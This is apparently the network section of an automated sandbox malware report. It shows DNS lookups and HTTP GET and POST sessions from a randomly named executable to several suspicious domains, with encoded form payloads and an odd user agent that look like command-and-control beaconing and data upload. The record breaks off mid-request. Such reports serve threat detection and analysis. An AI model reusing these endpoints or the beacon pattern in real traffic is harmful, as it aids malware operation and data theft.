                                              Jan 13, 2025 15:13:04.353023052 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.353868008 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.362180948 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.367003918 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.983576059 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.984253883 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.984314919 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.986888885 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.991667986 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:10.352494001 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:10.357372046 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:10.357461929 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:10.939888954 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:10.946563959 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:11.105389118 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:11.105453014 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:11.105513096 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:12.453556061 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.472177029 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.477263927 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:13.477360010 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.492908955 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.498477936 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:14.070802927 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:14.070856094 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:14.071351051 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:15.003329992 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.019099951 CET4999080192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.023936987 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.024035931 CET4999080192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.038543940 CET4999080192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.043334961 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.043451071 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.637634039 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.637768984 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.637821913 CET4999080192.168.2.7154.197.162.239

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2025 15:11:58.844191074 CET5090853192.168.2.71.1.1.1
                                              Jan 13, 2025 15:11:58.869842052 CET53509081.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:15.598342896 CET5239653192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:15.649455070 CET53523961.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:28.789077044 CET5532853192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:28.804534912 CET53553281.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:42.144491911 CET5763053192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:43.001068115 CET53576301.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:56.691220999 CET5446853192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:56.703926086 CET53544681.1.1.1192.168.2.7
                                              Jan 13, 2025 15:13:10.004805088 CET5414953192.168.2.71.1.1.1
                                              Jan 13, 2025 15:13:10.348145008 CET53541491.1.1.1192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 13, 2025 15:11:58.844191074 CET192.168.2.71.1.1.10x9a4eStandard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:15.598342896 CET192.168.2.71.1.1.10xb05dStandard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:28.789077044 CET192.168.2.71.1.1.10x2366Standard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:42.144491911 CET192.168.2.71.1.1.10x8767Standard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:56.691220999 CET192.168.2.71.1.1.10xb782Standard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:13:10.004805088 CET192.168.2.71.1.1.10xe8b2Standard query (0)www.investshares.netA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 13, 2025 15:11:58.869842052 CET1.1.1.1192.168.2.70x9a4eNo error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:15.649455070 CET1.1.1.1192.168.2.70xb05dNo error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                              Jan 13, 2025 15:12:15.649455070 CET1.1.1.1192.168.2.70xb05dNo error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:28.804534912 CET1.1.1.1192.168.2.70x2366No error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:28.804534912 CET1.1.1.1192.168.2.70x2366No error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:43.001068115 CET1.1.1.1192.168.2.70x8767No error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 13, 2025 15:12:43.001068115 CET1.1.1.1192.168.2.70x8767No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:43.001068115 CET1.1.1.1192.168.2.70x8767No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:12:56.703926086 CET1.1.1.1192.168.2.70xb782No error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                              Jan 13, 2025 15:13:10.348145008 CET1.1.1.1192.168.2.70xe8b2No error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.gayhxi.info
                                              • www.promocao.info
                                              • www.grimbo.boats
                                              • www.44756.pizza
                                              • www.lonfor.website
                                              • www.investshares.net

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.74997047.83.1.9080524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:11:58.893848896 CET490OUTGET /k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLx HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.gayhxi.info
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:00.550860882 CET139INHTTP/1.1 567 unknown
                                              Server: nginx/1.18.0
                                              Date: Mon, 13 Jan 2025 14:12:00 GMT
                                              Content-Length: 17
                                              Connection: close
                                              Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                              Data Ascii: Request too large


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.74997284.32.84.3280524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:15.672153950 CET754OUTPOST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 65 36 79 38 53 75 72 53 76 4f 35 54 61 70 46 73 42 52 59 2f 54 42 56 4b 39 6b 46 45 44 4a 52 72 53 30 68 66 6c 62 39 76 64 68 51 4a 48 62 6e 75 41 3d 3d
                                              Data Ascii: ptH8A6=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczve6y8SurSvO5TapFsBRY/TBVK9kFEDJRrS0hflb9vdhQJHbnuA==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.74997384.32.84.3280524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:18.226303101 CET774OUTPOST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 35 75 4f 2f 41 7a 54 6c 55 6b 70 54 77 35 53 48 76 63 77 71 45 36 45 56 36 6a 34 38 30 45 61 65 61 63 61 33 76 4e 37 74 6c 31 4b 41 75 4a 56 77 51 3d
                                              Data Ascii: ptH8A6=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC5uO/AzTlUkpTw5SHvcwqE6EV6j480Eaeaca3vN7tl1KAuJVwQ=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.74997484.32.84.3280524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:20.775971889 CET1787OUTPOST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 2b 42 55 5a 35 59 74 79 46 44 79 44 70 59 51 2f 4d 65 45 6d 41 33 77 68 78 43 62 58 4c 63 36 34 6b 69 46 6e 43 52 7a 71 31 36 46 39 69 4d 66 45 36 5a 39 71 67 43 59 54 71 6b 49 6d 39 61 51 71 43 4f 30 57 69 55 6d 33 63 76 59 48 6a 51 46 2f 70 73 30 38 69 4e 7a 4c 58 30 7a 44 58 55 68 56 6a 70 4a 37 74 77 34 32 45 52 35 57 36 63 64 62 2f 56 30 45 38 35 52 71 78 50 32 4f 30 52 34 4d 49 4d 38 48 35 7a 6b 32 32 37 53 32 46 61 53 5a 70 75 56 56 56 58 2f 47 75 6e 71 5a 6c 31 51 43 72 [TRUNCATED]
                                              Data Ascii: ptH8A6=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd++BUZ5YtyFDyDpYQ/MeEmA3whxCbXLc64kiFnCRzq16F9iMfE6Z9qgCYTqkIm9aQqCO0WiUm3cvYHjQF/ps08iNzLX0zDXUhVjpJ7tw42ER5W6cdb/V0E85RqxP2O0R4MIM8H5zk227S2FaSZpuVVVX/GunqZl1QCrNt+tSJvlYuV6sFx2XJrGI0dKpWdtmmNXl/YcAyOu1Ozh7WqUF4nL+sXBWxpNdcZbB7bV63sXEc72IjwtCFIQDb7/Zw3DBcJEHToFJoc94f0d2BfzkQn12FuSLv4/RRZL5cBBMsmZ2TzY8ezbrU6FCPRXuMPyY5gvMheq1F+bSNliCTx/FSt9KWT+Exz98focaasI7zJZ+HUuEhfB56HuRue3RPwPTIhfEPsznRFAWMJqt0wIzkYenpt+/RhVXIdE+8wnbOKejXNFiwd4tgdXSr1ULD3sKpxux/fj6CJkvDuOdRNGE6PXQ51zuWiTpJYbwJlxFVTJAds6WR4feNxqdjzOq8v+auYvFRRmuNsIGHt5HPwJpeEoXYyrIAJZ7VRSa+Qr3KaDW8RiVkiyShGcNq+tXv5IIl++PBnsGZAs4UwrUNXb0f8OVsXrOSyPs32QPYu47PAqgM+nSbA2HAVL9XygA43dkfTJ4ACDLxCvcph8HAcj77w2jVqf97IZdXYxq4dxtTIENvxxbq/SsFd18L38ge6SWFhwt4q8ZYHXJziFxRaOood4ENREJibRfFzjVDvHShVsR/FB7z5mDh6eeAKFXxM8xPh8skCUTNye+8yV3Gcr5YcveKQZFVaiTaBNfed5Kj2CDfTXFJ3glewJeuOXKKfNv/whM8 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.74997584.32.84.3280524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:23.317295074 CET492OUTGET /zaz4/?ptH8A6=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvD59p2x79JGj8+Yz9VVRMgvDTsTucbTnzBoQzXIZ9OSEU5EpWd7+rj1U&e4M=Tfa0_jE0 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.promocao.info
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:23.765716076 CET1236INHTTP/1.1 200 OK
                                              Date: Mon, 13 Jan 2025 14:12:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 9973
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Server: hcdn
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: d6b435b30d38f4f086bc470ba4a8a39e-bos-edge3
                                              Expires: Mon, 13 Jan 2025 14:12:22 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                              Jan 13, 2025 15:12:23.765743971 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                              Jan 13, 2025 15:12:23.765753984 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                              Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                              Jan 13, 2025 15:12:23.765789986 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                              Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                              Jan 13, 2025 15:12:23.765803099 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                              Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                              Jan 13, 2025 15:12:23.765814066 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                              Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                              Jan 13, 2025 15:12:23.765826941 CET776INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                              Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                              Jan 13, 2025 15:12:23.765836954 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                              Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                              Jan 13, 2025 15:12:23.765849113 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                              Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.749976104.21.18.17180524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:28.825917959 CET751OUTPOST /kxtt/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.grimbo.boats
                                              Origin: http://www.grimbo.boats
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.grimbo.boats/kxtt/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
